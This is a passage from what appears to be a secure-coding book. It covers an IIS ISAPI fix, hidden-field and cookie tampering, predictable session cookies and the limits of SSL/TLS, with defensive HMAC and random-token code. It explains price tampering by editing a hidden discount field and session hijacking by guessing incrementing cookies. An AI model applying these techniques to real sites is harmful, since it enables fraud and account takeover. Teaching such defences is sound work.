    
    //Get the server name.
    pECB->GetServerVariable(pECB->ConnID,
        "SERVER_NAME",
        szHostName, 
        &dwSize);

    //Convert ANSI string to Unicode.
    MultiByteToWideChar(CP_ACP,
        0, 
        (LPCSTR)szHostName, 
        -1, 
        g_wszHostName,
        sizeof (g_wszHostName) / sizeof(g_wszHostName[0]));

Two other fixes were added to IIS 6: IPP is off by default, and all users must be authenticated if they want to use the technology once it is enabled.

Some important lessons arise from this bug:

  • Perform more code reviews for ISAPI applications.

  • Perform even more code reviews for ISAPI filters.

  • Be wary of Unicode and ANSI size mismatches, which are common in ISAPI applications.

  • Turn less-used features off by default.

  • If your application accepts direct user input, authenticate the user first. If the user is really an attacker, you have a good idea who he or she is.

Sensitive Data in Cookies and Fields

If you create a cookie for users, you should consider what would happen if the user manipulated data in the cookie. The same applies to hidden fields; just because the field is hidden does not mean the data is protected.

I’ve seen two almost identical examples, one implemented using cookies, the other using hidden fields. In both cases, the developer placed a purchasing discount field in the cookie or the field on the HTML form, and the discount in the cookie or field was applied to the purchase. However, an attacker could easily change a 5 percent discount into a 50 percent discount, and the Web site would honor the value! In the case of the cookie example, the attacker simply changed the file on her hard drive, and in the field example, the attacker saved the source code for the HTML form, changed the hidden field value, and then posted the newly changed form to the Web site.
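
In the hidden-field case, the offending markup might have looked something like this (the field name and value are illustrative):

<input type="hidden" name="discount" value="5">

Changing the 5 to 50 in a saved copy of the form and posting it back is the entire "attack."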

More Information

A great example of this kind of vulnerability was the Element N.V. Element InstantShop Price Modification vulnerability. You can read about this case at http://www.securityfocus.com/bid/1836.

The first rule is this: don’t store sensitive data in cookies, hidden fields, or in any data that could potentially be manipulated by the user. If you must break the first rule, you should encrypt and apply a message authentication code (MAC) to the cookie or field content by using keys securely stored at the server. To the user, these data are opaque; they should not be manipulated in any way by any entity other than the Web server. It’s your data—you determine what is stored, what the format is, and how it is protected, not the user. You can learn more about MACs in Chapter 6.
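
The following C# sketch shows the MAC half of that advice. It is a minimal illustration, not a complete solution: key generation and secure storage of the key at the server are assumed and not shown.

using System;
using System.Text;
using System.Security.Cryptography;

static string ProtectValue(string data, byte[] key) {
    // Append a keyed hash so the server can detect client-side tampering.
    using (HMACSHA256 hmac = new HMACSHA256(key)) {
        byte[] mac = hmac.ComputeHash(Encoding.UTF8.GetBytes(data));
        return data + "." + Convert.ToBase64String(mac);
    }
}

When the cookie or field comes back, the server recomputes the HMAC over the data portion and compares it with the appended value; any mismatch means the data was manipulated.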

Be Wary of "Predictable Cookies"

The best way to explain this is by way of a story. I was asked to pass a cursory eye over a Web site created by a bank. The bank used cookies to support the user’s sessions. Remember that HTTP is a stateless protocol, so many Web sites use cookies to provide a stateful connection. RFC 2965, "HTTP State Management Mechanism," (http://www.ietf.org/rfc/rfc2965.txt) outlines how to use cookies in this manner.

The user maintained a list of tasks at the bank’s Web server akin to a commerce site’s shopping cart. If an attacker can guess the cookie, she can hijack the connection and manipulate the user’s banking tasks, including moving money between accounts. I asked the developers how the cookies were protected from attack. The answer was not what I wanted but is very common: "We use SSL." In this case, SSL would not help because the cookies were predictable. In fact, they were simply 32-bit hexadecimal values incrementing by one for each newly connected user. As an attacker, I simply connect to the site by using SSL and look at the cookie sent by the Web server to my client. Let’s say it’s 0005F1CC. I then quickly access the site again from a different session or computer, and let’s say this time the cookie is 0005F1CE. I do it again and get 0005F1CF. It’s obvious what’s going on: the cookie value is incrementing, and it looks like someone accessed the site between my first two connections and has a cookie valued 0005F1CD. At any point, I can create a new connection to the Web site and, by using the Cookie: header, set the cookie to 0005F1CD or any other value prior to my first connection cookie and hijack another user’s session. Then, potentially I can move funds around. Admittedly, I cannot choose my victim, but a disgruntled customer could be a huge loss for the bank, and of course the privacy implications of such an attack are serious.

The remedy and the moral of this story: make the cookies used for high-security situations unpredictable. In this case, the bank started creating cookies by using a good random number generator, which is discussed in Chapter 8. Also, do not rely on SSL, our next subject, to protect you from all attacks.
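
Before moving on, here is what generating such an unpredictable value might look like; a minimal C# sketch:

using System;
using System.Security.Cryptography;

static string NewSessionToken() {
    // 16 bytes from a cryptographic random number generator, base64-encoded.
    byte[] buf = new byte[16];
    using (RandomNumberGenerator rng = RandomNumberGenerator.Create()) {
        rng.GetBytes(buf);
    }
    return Convert.ToBase64String(buf);
}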

SSL/TLS Client Issues

I’ve lost count of how many times I’ve heard designers and developers claim they are secure from attack because they use that good old silver bullet called SSL. SSL or, more accurately, TLS as it’s now called, helps mitigate some threats but not all. By default, the protocol provides

  • Server authentication.

  • On-the-wire privacy using encryption.

  • On-the-wire integrity using message authentication codes.

It can also provide client authentication, but this option is not often used. The protocol does not provide the following:

  • Protection from application design and coding flaws. If you have a buffer overrun in your code, you still have a buffer overrun when using SSL/TLS.

  • Protection for the data once it leaves the secured connection.

You should also be aware that when a client application connects to a server by using SSL/TLS, the connection is protected before any other higher-level protocol data is transferred.

Finally, when connecting to a server, the client application should verify that the server name is the same as the common name in the X.509 certificate used by the server, that the certificate is well-formed and valid, and that it has not expired. By default, WinInet, WinHTTP, and the .NET Framework’s System.Net will verify these for you automatically. You can turn these checks off, but doing so is highly discouraged.

Summary

Because of XSS bugs, Web input is dangerous, especially for your users and your reputation. Don’t trust any input from the user; always look for well-formed data, and reject everything else. If you are paranoid, you should consider adding extra defensive mechanisms to your Web pages. Don’t just focus on dynamic Web content; you should review all HTML and HTML-like files for XSS bugs.
